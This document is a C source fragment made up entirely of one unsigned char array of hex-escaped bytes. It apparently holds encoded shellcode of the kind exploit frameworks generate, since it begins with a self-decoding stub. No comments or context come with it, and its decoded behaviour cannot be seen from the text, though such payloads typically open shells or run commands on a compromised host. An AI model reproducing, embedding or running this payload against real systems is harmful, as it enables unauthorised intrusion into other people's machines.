unsigned char buf[] = 
"\xdd\xc1\xbe\x6d\x34\x99\x51\xd9\x74\x24\xf4\x5a\x33\xc9"
"\xb1\x24\x83\xc2\x04\x31\x72\x16\x03\x72\x16\xe2\x98\xed"
"\x5b\x88\x16\x2a\xa8\x91\x8d\x6f\x4c\x8f\x6f\xa1\xa5\xfe"
"\x91\x42\xdb\xfd\x9c\x12\x37\xfd\xd3\xd4\xc9\x9d\x3c\x20"
"\xc8\xc0\xd5\x98\x57\x19\xce\xf3\xff\xfb\x81\x93\x1c\xe6"
"\x1c\x76\xa6\xb6\xa1\x94\x95\x63\xef\x3b\x3e\xd4\x75\xab"
"\x97\xe0\x86\x3a\x3f\x20\xf1\x13\xd8\x78\x74\xa3\x34\x15"
"\x65\x4c\xd2\x9a\x52\x35\xac\x91\xbe\xbd\x31\x0d\x97\x67"
"\xd3\xc2\xb2\xcd\x06\x07\x0f\x03\x24\x2b\xd4\x46\x28\xf6"
"\xfd\xec\x66\x9a\x40\x33\x38\x39\xcf\xeb\x47\x5c\x24\x70"
"\x5b\x41\x49\x5c\x93\x65\x38\x03\x5a\xb3\x1b\x53\x0d\x26"
"\xc3\xcc\xbd\x85\x64\xe5\x2e\xeb\x9c\x21\xf2\xf9\xf8\x4a"
"\x65\xe9";
